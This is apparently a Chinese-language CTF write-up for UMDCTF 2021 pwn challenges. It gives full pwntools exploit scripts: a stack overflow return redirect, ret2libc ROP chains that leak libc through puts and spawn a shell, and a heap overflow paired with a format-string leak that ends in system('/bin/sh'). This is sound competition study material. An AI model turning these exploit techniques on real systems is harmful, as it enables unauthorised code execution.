UMDCTF 2021
2024-09-06 23:03:44
6道pwn题,4道可以做。剩下一道题是arm架构,一道题是内核,溜了溜了。
Jump_Not_Easy
1 from pwn import *
2
3 p = process('./pwn')
4 elf = ELF('./pwn')
5 context.log_level = 'debug'
6
7 def duan():
8 gdb.attach(p)
9 pause()
10
11 payload = 'a'*0x40+'bbbbbbbb'+p64(0x040125D)
12 p.sendlineafter('go?\n',payload)
13 p.recv()
Jump_Is_Easy
system怎么也打不通,加了个ret才打通,估计又是栈对齐的问题(猜的)。
1 from pwn import *
2 from LibcSearcher import *
3
4 p = process('./pwn')
5 elf = ELF('./pwn')
6 context.log_level = 'debug'
7
8 def duan():
9 gdb.attach(p)
10 pause()
11
12 pop_rdi = 0x004012c3
13 ret = 0x0040101a
14 fun_got = elf.got['__libc_start_main']
15 puts_plt = elf.plt['puts']
16 main = elf.symbols['main']
17
18 payload = 'a'*0x40+'bbbbbbbb'
19 payload+= p64(pop_rdi)+p64(fun_got)
20 payload+= p64(puts_plt)+p64(main)
21
22 p.sendlineafter('go?\n',payload)
23 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
24 libc = LibcSearcher("__libc_start_main", fun_addr)
25 libc_base = fun_addr-libc.dump("__libc_start_main")
26 system = libc_base+libc.dump("system")
27 binsh = libc_base+libc.dump("str_bin_sh")
28 print 'system-->'+hex(system)
29 print 'binsh-->'+hex(binsh)
30 print 'libc_base-->'+hex(libc_base)
31
32 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
33 p.sendlineafter('go?\n',payload)
34 p.interactive()
Jump_Not_Working
感觉和上一题一样...
1 from pwn import *
2 from LibcSearcher import *
3
4 p = process('./pwn')
5 p = remote('chals5.umdctf.io',7004)
6 elf = ELF('./pwn')
7 context.log_level = 'debug'
8
9 def duan():
10 gdb.attach(p)
11 pause()
12
13 pop_rdi = 0x004012c3
14 ret = 0x0040101a
15 fun_got = elf.got['__libc_start_main']
16 puts_plt = elf.plt['puts']
17 main = elf.symbols['main']
18
19 payload = 'a'*0x40+'bbbbbbbb'
20 payload+= p64(pop_rdi)+p64(fun_got)
21 payload+= p64(puts_plt)+p64(main)
22
23 p.sendlineafter('go?\n',payload)
24 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
25 libc = LibcSearcher("__libc_start_main", fun_addr)
26 libc_base = fun_addr-libc.dump("__libc_start_main")
27 system = libc_base+libc.dump("system")
28 binsh = libc_base+libc.dump("str_bin_sh")
29 print 'system-->'+hex(system)
30 print 'binsh-->'+hex(binsh)
31 print 'libc_base-->'+hex(libc_base)
32
33 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)
34 p.sendlineafter('go?\n',payload)
35 p.interactive()
Jump_Is_Found
堆溢出+格式化字符串漏洞,不知道为什么打不了got表。仔细分析代码就可以出。
1 from pwn import *
2 from LibcSearcher import *
3
4 p = process('./pwn')
5 elf = ELF('./pwn')
6 context(os='linux',arch='amd64',log_level='debug')
7
8 def duan():
9 gdb.attach(p)
10 pause()
11
12 payload = 'a'*0x100+p64(0)+p64(0x111)+'%51$p'
13 p.sendlineafter('CONSOLE> ',payload)
14 p.recvuntil('location: ')
15 fun_got = int(p.recv(14),16)-231
16
17 libc = LibcSearcher("__libc_start_main",fun_got)
18 libc_base = fun_got-libc.dump("__libc_start_main")
19 system = libc_base+libc.dump("system")
20 binsh = libc_base+libc.dump("str_bin_sh")
21 print 'libc_base-->'+hex(libc_base)
22 print 'system-->'+hex(system)
23
24 payload = '1'.ljust(0x100,'a')+p64(0)+p64(0x111)+'/bin/sh\x00'.ljust(0x100,'a')+p64(0)+p64(0x21)+p64(system)*3
25 p.sendlineafter('CONSOLE> ',payload)
26 p.interactive()
总结
第一次做国外的比赛,感觉还算友好。
最新文章
- linux 星际词霸安装
- runtime-对成员变量操作应用之归档和返归档
- 异步Promise实现
- css鼠标手型cursor中hand与pointer
- onselectstart和onselect的使用
- 【BZOJ-4518】征途 DP + 斜率优化
- C-线性顺序表的增删改查
- BZOJ 1901 &; 整体二分
- AD7715
- 模板 树链剖分BFS版本
- Python 文件操作模块 shutil 详解
- SpringMVC与Struts2配置区别
- 20130620—ant和java杂学随笔
- Unity3D中的AI架构模型
- IntelliJ Idea设置护眼浅绿色背景方法
- RabbitMQ 实现远程过程调用RPC
- 谈谈Java中的代理模式
- Linux文件系统及文件属性
- Greeting Card
- PHP开发小技巧②—实现二维数组根据key进行排序
热门文章
- 解决异常:“The last packet sent successfully to the server was 0 milliseconds ago. ”的办法
- 细说ThreadLocal(一)
- [gym103055H]Grammy and HearthStone
- vue 3 学习笔记 (八)——provide 和 inject 用法及原理
- System类的常用方法(currentTimeMillis与arraycopy)
- 数值分析:幂迭代和PageRank算法(Numpy实现)
- Codeforces 690A2 - Collective Mindsets (medium)
- 如何反向推断基因型文件中的参考碱基(REF/ALT)?
- plink 进行PCA分析
- 一个画组织解剖图R包